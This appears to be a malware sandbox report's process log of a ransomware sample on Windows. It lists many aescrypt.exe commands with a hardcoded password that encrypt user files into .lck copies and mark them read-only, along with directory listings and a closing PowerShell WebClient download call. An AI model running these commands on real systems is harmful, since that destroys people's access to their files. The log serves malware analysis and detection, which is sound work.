C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectBlock.html.lck" "ProtectBlock.html"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ProtectBlock.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountEdit.ex_.lck" "MountEdit.ex_"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MountEdit.ex_.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutHide.eps.lck" "OutHide.eps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutHide.eps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceivePop.shtml.lck" "ReceivePop.shtml"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReceivePop.shtml.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectAdd.mpp.lck" "ConnectAdd.mpp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectAdd.mpp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DenyApprove.odt.lck" "DenyApprove.odt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DenyApprove.odt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockWait.rar.lck" "BlockWait.rar"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BlockWait.rar.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LockSave.wav.lck" "LockSave.wav"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "LockSave.wav.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallSet.bin.lck" "InstallSet.bin"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "InstallSet.bin.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishUpdate.jpe.lck" "PublishUpdate.jpe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PublishUpdate.jpe.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "JoinWait.pot.lck" "JoinWait.pot"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "JoinWait.pot.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideUnlock.nfo.lck" "HideUnlock.nfo"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "HideUnlock.nfo.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutSuspend.gif.lck" "OutSuspend.gif"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutSuspend.gif.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutExit.potx.lck" "OutExit.potx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutExit.potx.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockJoin.TS.lck" "UnlockJoin.TS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnlockJoin.TS.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreReset.cfg.lck" "RestoreReset.cfg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RestoreReset.cfg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugPop.mpeg.lck" "DebugPop.mpeg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DebugPop.mpeg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CheckpointSet.zip.lck" "CheckpointSet.zip"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CheckpointSet.zip.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreRegister.odt.lck" "RestoreRegister.odt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RestoreRegister.odt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDeny.xps.lck" "RevokeDeny.xps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDeny.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterConvertFrom.wma.lck" "RegisterConvertFrom.wma"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RegisterConvertFrom.wma.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LimitDismount.wdp.lck" "LimitDismount.wdp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "LimitDismount.wdp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisablePing.hta.lck" "DisablePing.hta"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisablePing.hta.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopMerge.mov.lck" "PopMerge.mov"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PopMerge.mov.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSave.TS.lck" "ResumeSave.TS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSave.TS.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExpandOpen.reg.lck" "ExpandOpen.reg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExpandOpen.reg.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Wallpaper.jpg.lck" "Wallpaper.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Wallpaper.jpg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameTest.raw.lck" "RenameTest.raw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "RenameTest.raw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UninstallPush.dib.lck" "UninstallPush.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UninstallPush.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteOpen.svgz.lck" "CompleteOpen.svgz"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CompleteOpen.svgz.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertEnable.wmf.lck" "ConvertEnable.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertEnable.wmf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncOpen.png.lck" "SyncOpen.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "SyncOpen.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestBackup.pcx.lck" "RequestBackup.pcx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RequestBackup.pcx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportHide.bmp.lck" "ExportHide.bmp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExportHide.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceStop.raw.lck" "TraceStop.raw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "TraceStop.raw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchCheckpoint.gif.lck" "SearchCheckpoint.gif"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SearchCheckpoint.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeConfirm.dib.lck" "ResumeConfirm.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResumeConfirm.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OpenSkip.dwg.lck" "OpenSkip.dwg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OpenSkip.dwg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MeasureSend.cr2.lck" "MeasureSend.cr2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MeasureSend.cr2.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchHide.tif.lck" "WatchHide.tif"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "WatchHide.tif.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteEnable.dxf.lck" "CompleteEnable.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CompleteEnable.dxf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendRestart.ico.lck" "SendRestart.ico"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SendRestart.ico.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearTrace.emz.lck" "ClearTrace.emz"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ClearTrace.emz.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SwitchRestart.tif.lck" "SwitchRestart.tif"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "SwitchRestart.tif.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutInitialize.crw.lck" "OutInitialize.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "OutInitialize.crw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSync.crw.lck" "ResumeSync.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSync.crw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportUndo.eps.lck" "ExportUndo.eps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExportUndo.eps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeConvert.tiff.lck" "InitializeConvert.tiff"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "InitializeConvert.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisconnectPop.bmp.lck" "DisconnectPop.bmp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisconnectPop.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteDisable.emf.lck" "WriteDisable.emf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteDisable.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CloseExpand.dxf.lck" "CloseExpand.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CloseExpand.dxf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRegister.tiff.lck" "ReadRegister.tiff"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "ReadRegister.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadDismount.jpg.lck" "ReadDismount.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReadDismount.jpg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectWait.svg.lck" "ConnectWait.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectWait.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountFind.emf.lck" "DismountFind.emf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DismountFind.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UpdateUnblock.svg.lck" "UpdateUnblock.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UpdateUnblock.svg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GrantFind.png.lck" "GrantFind.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "GrantFind.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.dxf.lck" "TraceRead.dxf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.dxf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupSync.dib.lck" "BackupSync.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BackupSync.dib.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairSearch.crw.lck" "RepairSearch.crw"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "RepairSearch.crw.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetFind.png.lck" "GetFind.png"3⤵
- Modifies extensions of user files
-
C:\Windows\system32\attrib.exeattrib +r "GetFind.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WaitGet.wmf.lck" "WaitGet.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WaitGet.wmf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceComplete.svg.lck" "TraceComplete.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceComplete.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteApprove.jpeg.lck" "WriteApprove.jpeg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteApprove.jpeg.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Everywhere.search-ms.lck" "Everywhere.search-ms"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Everywhere.search-ms.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
